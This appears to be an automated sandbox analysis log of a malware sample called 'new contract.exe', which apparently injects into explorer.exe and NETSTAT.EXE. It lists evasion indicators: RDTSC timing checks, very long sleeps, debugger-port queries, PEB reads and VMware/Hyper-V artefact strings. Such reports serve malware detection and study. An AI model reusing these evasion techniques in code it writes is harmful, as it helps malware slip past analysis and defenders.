          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 519904 second address: 51990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 519B6E second address: 519B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\new contract.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeMemory allocated: 4F50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeMemory allocated: 9030000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeMemory allocated: A030000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeMemory allocated: A230000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeMemory allocated: B230000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\Desktop\new contract.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6573Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3365Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 859Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEWindow / User API: threadDelayed 5994Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEWindow / User API: threadDelayed 3978Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-13938
          Source: C:\Users\user\Desktop\new contract.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 2.0 %
          Source: C:\Users\user\Desktop\new contract.exe TID: 7444Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 8076Thread sleep count: 6573 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8076Thread sleep time: -13146000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 8076Thread sleep count: 3365 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8076Thread sleep time: -6730000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904Thread sleep count: 5994 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904Thread sleep time: -11988000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904Thread sleep count: 3978 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904Thread sleep time: -7956000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\new contract.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000000.1754990382.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000003.00000000.1754990382.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.4138853699.000000000997A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.4138853699.000000000997A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000002.4133315277.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000003.00000002.4137532531.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\new contract.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4164 mov eax, dword ptr fs:[00000030h]2_2_016F4164
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4164 mov eax, dword ptr fs:[00000030h]2_2_016F4164
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B4144 mov eax, dword ptr fs:[00000030h]2_2_016B4144
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B4144 mov eax, dword ptr fs:[00000030h]2_2_016B4144
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B4144 mov ecx, dword ptr fs:[00000030h]2_2_016B4144
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B4144 mov eax, dword ptr fs:[00000030h]2_2_016B4144
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B4144 mov eax, dword ptr fs:[00000030h]2_2_016B4144
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B8158 mov eax, dword ptr fs:[00000030h]2_2_016B8158
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626154 mov eax, dword ptr fs:[00000030h]2_2_01626154
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626154 mov eax, dword ptr fs:[00000030h]2_2_01626154
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161C156 mov eax, dword ptr fs:[00000030h]2_2_0161C156
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01650124 mov eax, dword ptr fs:[00000030h]2_2_01650124
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov ecx, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov ecx, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov ecx, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov eax, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE10E mov ecx, dword ptr fs:[00000030h]2_2_016CE10E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CA118 mov ecx, dword ptr fs:[00000030h]2_2_016CA118
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CA118 mov eax, dword ptr fs:[00000030h]2_2_016CA118
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CA118 mov eax, dword ptr fs:[00000030h]2_2_016CA118
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CA118 mov eax, dword ptr fs:[00000030h]2_2_016CA118
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E0115 mov eax, dword ptr fs:[00000030h]2_2_016E0115
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F61E5 mov eax, dword ptr fs:[00000030h]2_2_016F61E5
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016501F8 mov eax, dword ptr fs:[00000030h]2_2_016501F8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E61C3 mov eax, dword ptr fs:[00000030h]2_2_016E61C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E61C3 mov eax, dword ptr fs:[00000030h]2_2_016E61C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E1D0 mov eax, dword ptr fs:[00000030h]2_2_0169E1D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E1D0 mov eax, dword ptr fs:[00000030h]2_2_0169E1D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0169E1D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E1D0 mov eax, dword ptr fs:[00000030h]2_2_0169E1D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E1D0 mov eax, dword ptr fs:[00000030h]2_2_0169E1D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01660185 mov eax, dword ptr fs:[00000030h]2_2_01660185
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DC188 mov eax, dword ptr fs:[00000030h]2_2_016DC188
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DC188 mov eax, dword ptr fs:[00000030h]2_2_016DC188
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C4180 mov eax, dword ptr fs:[00000030h]2_2_016C4180
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C4180 mov eax, dword ptr fs:[00000030h]2_2_016C4180
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A019F mov eax, dword ptr fs:[00000030h]2_2_016A019F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A019F mov eax, dword ptr fs:[00000030h]2_2_016A019F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A019F mov eax, dword ptr fs:[00000030h]2_2_016A019F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A019F mov eax, dword ptr fs:[00000030h]2_2_016A019F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161A197 mov eax, dword ptr fs:[00000030h]2_2_0161A197
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161A197 mov eax, dword ptr fs:[00000030h]2_2_0161A197
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161A197 mov eax, dword ptr fs:[00000030h]2_2_0161A197
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164C073 mov eax, dword ptr fs:[00000030h]2_2_0164C073
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01622050 mov eax, dword ptr fs:[00000030h]2_2_01622050
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6050 mov eax, dword ptr fs:[00000030h]2_2_016A6050
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161A020 mov eax, dword ptr fs:[00000030h]2_2_0161A020
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161C020 mov eax, dword ptr fs:[00000030h]2_2_0161C020
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B6030 mov eax, dword ptr fs:[00000030h]2_2_016B6030
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A4000 mov ecx, dword ptr fs:[00000030h]2_2_016A4000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h]2_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h]2_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h]2_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h]2_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h]2_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h]2_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h]2_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C2000 mov eax, dword ptr fs:[00000030h]2_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h]2_2_0163E016
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h]2_2_0163E016
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h]2_2_0163E016
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E016 mov eax, dword ptr fs:[00000030h]2_2_0163E016
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0161A0E3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A60E0 mov eax, dword ptr fs:[00000030h]2_2_016A60E0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016280E9 mov eax, dword ptr fs:[00000030h]2_2_016280E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161C0F0 mov eax, dword ptr fs:[00000030h]2_2_0161C0F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016620F0 mov ecx, dword ptr fs:[00000030h]2_2_016620F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A20DE mov eax, dword ptr fs:[00000030h]2_2_016A20DE
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016180A0 mov eax, dword ptr fs:[00000030h]2_2_016180A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B80A8 mov eax, dword ptr fs:[00000030h]2_2_016B80A8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E60B8 mov eax, dword ptr fs:[00000030h]2_2_016E60B8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E60B8 mov ecx, dword ptr fs:[00000030h]2_2_016E60B8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162208A mov eax, dword ptr fs:[00000030h]2_2_0162208A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C437C mov eax, dword ptr fs:[00000030h]2_2_016C437C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F634F mov eax, dword ptr fs:[00000030h]2_2_016F634F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A2349 mov eax, dword ptr fs:[00000030h]2_2_016A2349
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov ecx, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A035C mov eax, dword ptr fs:[00000030h]2_2_016A035C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EA352 mov eax, dword ptr fs:[00000030h]2_2_016EA352
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C8350 mov ecx, dword ptr fs:[00000030h]2_2_016C8350
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F8324 mov eax, dword ptr fs:[00000030h]2_2_016F8324
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F8324 mov ecx, dword ptr fs:[00000030h]2_2_016F8324
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F8324 mov eax, dword ptr fs:[00000030h]2_2_016F8324
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F8324 mov eax, dword ptr fs:[00000030h]2_2_016F8324
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A30B mov eax, dword ptr fs:[00000030h]2_2_0165A30B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A30B mov eax, dword ptr fs:[00000030h]2_2_0165A30B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A30B mov eax, dword ptr fs:[00000030h]2_2_0165A30B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161C310 mov ecx, dword ptr fs:[00000030h]2_2_0161C310
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01640310 mov ecx, dword ptr fs:[00000030h]2_2_01640310
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016303E9 mov eax, dword ptr fs:[00000030h]2_2_016303E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E3F0 mov eax, dword ptr fs:[00000030h]2_2_0163E3F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E3F0 mov eax, dword ptr fs:[00000030h]2_2_0163E3F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E3F0 mov eax, dword ptr fs:[00000030h]2_2_0163E3F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016563FF mov eax, dword ptr fs:[00000030h]2_2_016563FF
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DC3CD mov eax, dword ptr fs:[00000030h]2_2_016DC3CD
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A3C0 mov eax, dword ptr fs:[00000030h]2_2_0162A3C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h]2_2_016283C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h]2_2_016283C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h]2_2_016283C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016283C0 mov eax, dword ptr fs:[00000030h]2_2_016283C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A63C0 mov eax, dword ptr fs:[00000030h]2_2_016A63C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE3DB mov eax, dword ptr fs:[00000030h]2_2_016CE3DB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE3DB mov eax, dword ptr fs:[00000030h]2_2_016CE3DB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE3DB mov ecx, dword ptr fs:[00000030h]2_2_016CE3DB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CE3DB mov eax, dword ptr fs:[00000030h]2_2_016CE3DB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C43D4 mov eax, dword ptr fs:[00000030h]2_2_016C43D4
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C43D4 mov eax, dword ptr fs:[00000030h]2_2_016C43D4
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E388 mov eax, dword ptr fs:[00000030h]2_2_0161E388
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E388 mov eax, dword ptr fs:[00000030h]2_2_0161E388
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E388 mov eax, dword ptr fs:[00000030h]2_2_0161E388
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164438F mov eax, dword ptr fs:[00000030h]2_2_0164438F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164438F mov eax, dword ptr fs:[00000030h]2_2_0164438F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01618397 mov eax, dword ptr fs:[00000030h]2_2_01618397
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01618397 mov eax, dword ptr fs:[00000030h]2_2_01618397
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01618397 mov eax, dword ptr fs:[00000030h]2_2_01618397
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624260 mov eax, dword ptr fs:[00000030h]2_2_01624260
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624260 mov eax, dword ptr fs:[00000030h]2_2_01624260
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624260 mov eax, dword ptr fs:[00000030h]2_2_01624260
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161826B mov eax, dword ptr fs:[00000030h]2_2_0161826B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
